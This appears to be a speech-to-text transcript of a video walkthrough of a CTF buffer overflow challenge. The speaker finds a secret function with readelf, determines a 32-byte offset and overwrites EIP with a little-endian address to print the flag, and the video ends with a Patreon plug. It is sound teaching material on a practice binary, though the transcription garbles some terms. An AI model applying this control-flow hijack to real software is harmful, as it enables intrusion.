 The first challenge in the extreme category from Ryan Nicholson CTF is called every day I'm buffering for a hundred points So the challenge prompt here is crash the program just right to retrieve the flag So they give us a shell we can work with log in with CTF seven and challenge seven and LS and we see that we have a program in our current directory that we can play with and work with So if I run this program, it says quit copying me and it looks like it's waiting for input So the sub and it just spits out our input back at us and we're back to our prompt. So Assuming just kind of trying to gauge from the challenge title here We can kind of safely say we're gonna end up doing a buffer overflow in this challenge So this is the first time I've actually recorded doing a buffer overflow on video and I'm pretty bad at trying to showcase this with like lots of Graphs and pictures and images of how the stack works and stuff like that So there hopefully will be a little bit of suspended disbelief and you will understand But I'm not going to show anything extra other than just me typing on the terminal. So Hopefully it'll still Be ingrained in your mind a little bit What I'm gonna do here is just actually for one thing showcase my methodology and that I wanted to do a little bit of More file reconnaissance in this thing. So I wanted to see other strings in this binary And I see other stuff that says you found the secret function and the flag dot text file The flag is blah blah blah. So there's nothing in here other than you found the secret function Although that is peculiar because it makes me wonder What we have to work with in this binary So something that I'm going to actually use is called a read elf and You can use read elf tech s to note the symbols that you want to get out of it And then you give it the program or the binary that you're looking for and this will list out all the different kind of Symbols There's a lot here. So if you wanted to like strip this down You can see things that are labeled as functions and if you want to just grep for only those we can grep tech I for funk So see we even see one results here for secret function So how do we get access to that or how do we get that program to run the secret function? Because it didn't look like it printed that out for us and when we ran it when we actually ran the program We weren't able to do anything other than enter something So thus enters the notion of a Buffer overflow. So if I just spam garbage into this thing It tries to spit it back out at me and it gives me a segmentation fault So we've crashed the program at this point now if I want to know where things particularly crashed or how I made this This this fault occur I can run D message and this is a lot of output in the Webshell terminal here, so I'm going to pipe this into tail and it says at the very very last line. Okay, pro program here Head a segment fault at four one four one four one four one four one and instruction pointer four one four one four one So what we've done is actually these a's capital a's are Zero x four one when you're for lemon and hex so what we've done is we have overflowed the Buffer that was storing that input and we have exceeded that cap and pushed outside broke through the buffer limit and now we're leaking onto the stack frame and we've Overwritten the return address that is stored at the very top of the stack So now when the our program would normally want to return to a different function rather than this input function It isn't able to because obviously there is no function residing at memory address four one four one four one four one Normally, this would just be the same Function that we came from before and it would be able to like successfully return back to that function But since we've overflowed it We can control the IP or the instruction pointer to Point it to wherever we really want it to go like if we wanted to go back to the main function We particularly could or we could make it call the secret function So we need some way to actually get to that memory address 040 sorry 080485 3b for a secret function So we'll have to submit those and give them to the program as bytes First thing we need to do is figure out where the offset is as to where we're getting that segfault where we're getting our Overriding EIP position. So kind of a trick that some people do here is actually use Python in one line to take advantage of The string multiple multiplier here and then pipe that output which if we have originally that is 50 a's that we can give to the program and We know we get a segfault so let's try and shrink this down and find that offset as to where we overwrite EIP or where we don't Overwrite EIP EIP being the register IP being E being 32-bit and IP being instruction pointer. So That didn't have an error. So let's try and do a little like binary search in our own manual Discussion here 40 that gives us another segfault. So Do we get any luck there? No I want to see where we can get this 4141412 change into what it should normally be. So let's try 35. Oh Okay, so that's changed a little bit. We're missing a byte here at the very very end. So let's bring that down to 32 Oh illegal instruction core dump. So let's check out that it says traps program trap invalid opcode So something different than what we would normally expect here, but we tried 30. What about 31? Is that just the okay? No segfault there. Is that just a threshold? Is that the balance? So let's try 33 okay now we get a segfault and You can see that for one is starting to leak into where it would normally be overriding this instruction pointer here If I added another 34 The message you can see another for one just leaking in again 35 How do we look here for one for one for one? So we can say that we can safely say that 32 is where we can start to access things and let's verify that Let's try 32 and then let's add BBB So now we can check that out and see we have a segfault at 424242 for two So we have complete control following our 32 a's to whatever we add afterwards. We'll go to that hex bite So now we have to actually send this memory address in hex But still keep the end in this or keep the actual like like structure of That function written in memory. So we can kick advantage of this by doing it in in two ways I'm gonna get over to my terminal here in Python if you import the struct module and If you need some documentation on this you can do Python struct Interpret string does as packed binary data and you can pack it into a specific format Typically, we want a little end in because that's just how our Intel processors are and I in this case Will be an unsigned integer. So it's the number that we're looking for in memory. So you can do struct dot pack with I didn't have it copied correctly secret function copy Do we have it now? No, what the heck? Hey webshop and in fact that actually has to be the second argument You have to specify the format and type first. So less than symbol or walka-walka and I denoted there and The hex value that we're trying to convert into little Andy and raw bytes. So just like this And that's pretty handy. It doesn't make a whole lot of sense. If you actually have poem tools installed you can use P32 or P64 if you're working with that data So you just pass in that as argument and it will give you that same put it in proper little Andy in format So you can see this is just switching the bytes around into little Andy in format and then using the backslash x to denote Okay, it's raw hex data. So now if I go ahead and supply this to our Exploit or our attack into the program We can If I paste from browser here to note that string Our 32 bytes for our offer our overflow and then overwrite EIP to the address of the secret function It should return back and call that secret function and we get it It says you found the secret function the flag is by collateral. So cool We finally got that we can go ahead and submit that for points And we can keep track of it in our notes if we particularly want to whatever. I'm just gonna type this out by collateral Cool So take note in that if you wanted to create your own notes function as to how you went through that or your notes file to discover that Secret function and convert it into bytes out of the hex address But that is a speed run of how to do a buffer overflow When there is a vulnerable function waiting for you in the binary But you should always check for that because most challenges have that set up Cool. Hey, I want to give a special shout out to the people that love and support me on patreon I cannot say thank you enough. All of these people are awesome $1 a month on patreon will give you a special shout out at the end of every video just like this $5 a month on patreon will give you early access to everything I release on YouTube if you did like this video Please do like comment and subscribe Check out us out on discord join our discord server link in the description And I hope to see you maybe some love from patreon. Cool. See you soon